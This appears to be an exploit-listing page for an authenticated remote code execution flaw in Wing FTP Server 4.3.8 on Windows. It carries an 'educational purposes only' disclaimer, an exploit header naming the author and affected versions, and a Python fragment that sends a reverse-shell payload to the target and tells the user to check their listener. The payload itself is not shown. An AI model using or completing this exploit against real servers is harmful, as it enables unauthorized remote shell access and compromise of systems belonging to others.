Exploits / Vulnerability Discovered : 2022-02-08 |
Type : remote |
Platform : windows
This exploit / vulnerability Wing ftp server 4.3.8 remote code execution (rce) (authenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Wing FTP Server - Authenticated RCE
# Date: 02/06/2022
# Exploit Author: notcos
# Credit: Credit goes to the initial discoverer of this exploit, Alex Haynes.
# Vendor Homepage: https://www.wftpserver.com/
# Software Link: https://www.wftpserver.com/download/WingFtpServer.exe
# Version: <=4.3.8
# Tested on: Windows
# Send the reverse shell payload
try:
r = requests.post(url, headers=headers, data=finalload, timeout=0.1)
except requests.exceptions.ReadTimeout:
print("The payload has been sent. Check your listener.")
pass
Wing ftp server 4.3.8 remote code execution (rce) (authenticated)